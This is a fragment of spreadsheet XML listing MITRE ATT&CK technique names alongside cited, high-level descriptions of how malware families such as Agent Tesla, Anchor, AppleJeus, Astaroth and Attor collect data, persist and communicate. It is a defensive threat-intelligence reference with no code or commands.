    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the username from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the timestamp from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can access the victim’s webcam and record video.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Agent Tesla](https://attack.mitre.org/software/S0331) has he ability to perform anti-sandboxing and anti-virtualization checks.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used HTTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used wmi queries to gather information from the system.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) saves system information into an XML file that is then XOR-encoded.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>Exfiltration over USB</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.(Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) attempts to download an encrypted binary from a specified domain.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) obtains the victim username and saves it to a file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has been signed with valid certificates to evade detection by security tools.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can install itself as a cron job.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Variants of [Anchor](https://attack.mitre.org/software/S0504) can use DNS tunneling to communicate with C2.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can terminate itself if specific execution flags are not present.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can self delete its dropper after the malware is successfully deployed.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can download additional payloads.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used NTFS to hide files.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used ICMP in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has obsuscated code with stack strings and string encryption.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can support windows execution via SMB shares.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create a scheduled task for persistence.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create and execute services to load its payload.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has come with a packed payload.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the hostname and linux version on a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the public IP and location of a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used cmd.exe to run its self deletion routine.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can establish persistence by creating a service.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has presented the user with a UAC prompt to elevate privileges while installing.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) has used a valid digital signature from Sectigo to appear legitimate.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has decoded files received from a C2.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has exfiltrated collected host information to a C2 server.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has deleted the MSI file after installation.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has added a leading &lt;code&gt;.&lt;/code&gt; to plist filenames, unlisting them from the Finder app and default Terminal directory listings.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has placed a plist file within the &lt;code&gt;LaunchDaemons&lt;/code&gt; folder and launched it manually.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has loaded a plist file using the &lt;code&gt;launchctl&lt;/code&gt; command.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has required user execution of a malicious MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584)'s spearphishing links required user interaction to navigate to the malicious website.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been installed via MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has XOR-encrypted collected system information prior to sending to a C2. [AppleJeus](https://attack.mitre.org/software/S0584) has also used the open source ADVObfuscation library for its components.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has created a scheduled SYSTEM task that runs when a user logs in.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been distributed via spearphishing link.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has collected the victim host information after infection.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has waited a specified time before downloading a second stage payload.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has used shell scripts to execute commands after installation and set persistence mechanisms.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has sent data to its C2 server via &lt;code&gt;POST&lt;/code&gt; requests.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) can install itself as a service.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the titles of running windows on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used ZIP to compress data gathered on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Create Process with Token</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to execute a process using &lt;code&gt;runas&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to collect data from USB devices.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to decrypt the loader configuration and payload DLL.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a DGA for C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to delete files and directories on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather metadata from a file and to search for file and directory names.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to download additional payloads from C2.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to launch files using &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used TCP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used an encrypted configuration file for its loader.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to enumerate loaded modules for a process.(Citation: CheckPoint Naikon May 2020).</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a reverse SOCKS proxy module.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has established persistence via the Startup folder or Run Registry key.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to capture screenshots on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the location, public IP address, and domain name on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather TCP and UDP table status listings.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the username on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to duplicate a token from ntprint.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) can be used to display ARP configuration information on the host.</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses ActiveX objects for file execution and manipulation. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses an external software known as NetPass to recover passwords. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can launch itself via DLL Search Order Hijacking.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>Dead Drop Resolver</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. (Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used a DGA in C2 communications.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) exfiltrates collected information from its r1.log file to the external C2 server. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) loads its module with the XSL script parameter &lt;code&gt;vShow&lt;/code&gt; set to zero, which opens the application with a hidden window. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses [certutil](https://attack.mitre.org/software/S0160) and [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional malware. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses JavaScript to perform its core functionalities. (Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) logs keystrokes from the victim's machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects data in a plaintext file named r1.log before exfiltration. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious files including VBS, LNK, and HTML for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can abuse alternate data streams (ADS) to store content for malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) searches for different processes on the system.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) creates a startup item for persistence. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can be loaded through regsvr32.exe.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) checks for the presence of Avast antivirus in the &lt;code&gt;C:\Program\Files\&lt;/code&gt; folder. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses the LoadLibraryExW() function to load additional modules. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373)'s initial payload is a malicious .LNK file. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a software packer called Pe123\RPolyCryptor.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has been delivered via malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) encodes data using Base64 before sending it to the C2 server. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the machine name and keyboard language from the system. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the external IP address from the system. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the timestamp from the infected machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious VBS e-mail attachments for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) spawns a CMD process to execute commands. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses WMIC to execute payloads. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can obtain application window titles and then determines which windows to perform Screen Capture on.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) encrypts collected data with a custom implementation of Blowfish and RSA ciphers.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s Blowfish key is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) performs the injection by attaching its code into the APC queue using NtQueueApcThread API.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that is capable of recording audio using available input sound devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has automatically collected data about the compromised system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has exfiltrated data over the C2 channel.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)’s plugin deletes the collected files and log files after exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used FTP protocol for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can download additional plugins, updates and other files. (Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>One of [Attor](https://attack.mitre.org/software/S0438)'s plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has staged collected data in a central upload directory prior to exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence via adding a Registry key with a logon script &lt;code&gt;HKEY_CURRENT_USER\Environment "UserInitMprLogonScript" &lt;/code&gt;.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can modify the Run registry key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used Tor for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher has used CreateProcessW API for execution.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Strings in [Attor](https://attack.mitre.org/software/S0438)'s components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects information about inserted storage devices, modems, and phone devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can inject itself into running processes to gain higher privileges and to evade detection.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has opened the registry and performed query searches.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule a new task that loads the dispatcher on boot/logon.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that captures screenshots of the target applications.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can be executed as a service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can execute additional plugins by loading the respective DLLs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) monitors the free disk space on the system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has manipulated the time of last access to files and registry keys after they have been created or modified.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence by registering a new service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) uses XOR and RC4 to perform decryption on the code functions.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can delete files from the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can search through folders and files on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can download files and additional malware.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) encrypts the configuration.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can inject code from files to other running processes.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can utilize proxy for communications.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can open a reverse shell on the system to execute commands.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is installed as a new service on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) attempts to escalate privileges by bypassing User Access Control.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) downloads a PowerShell script that decodes to a typical shellcode loader.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) has sent a C2 response that was base64-encoded.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
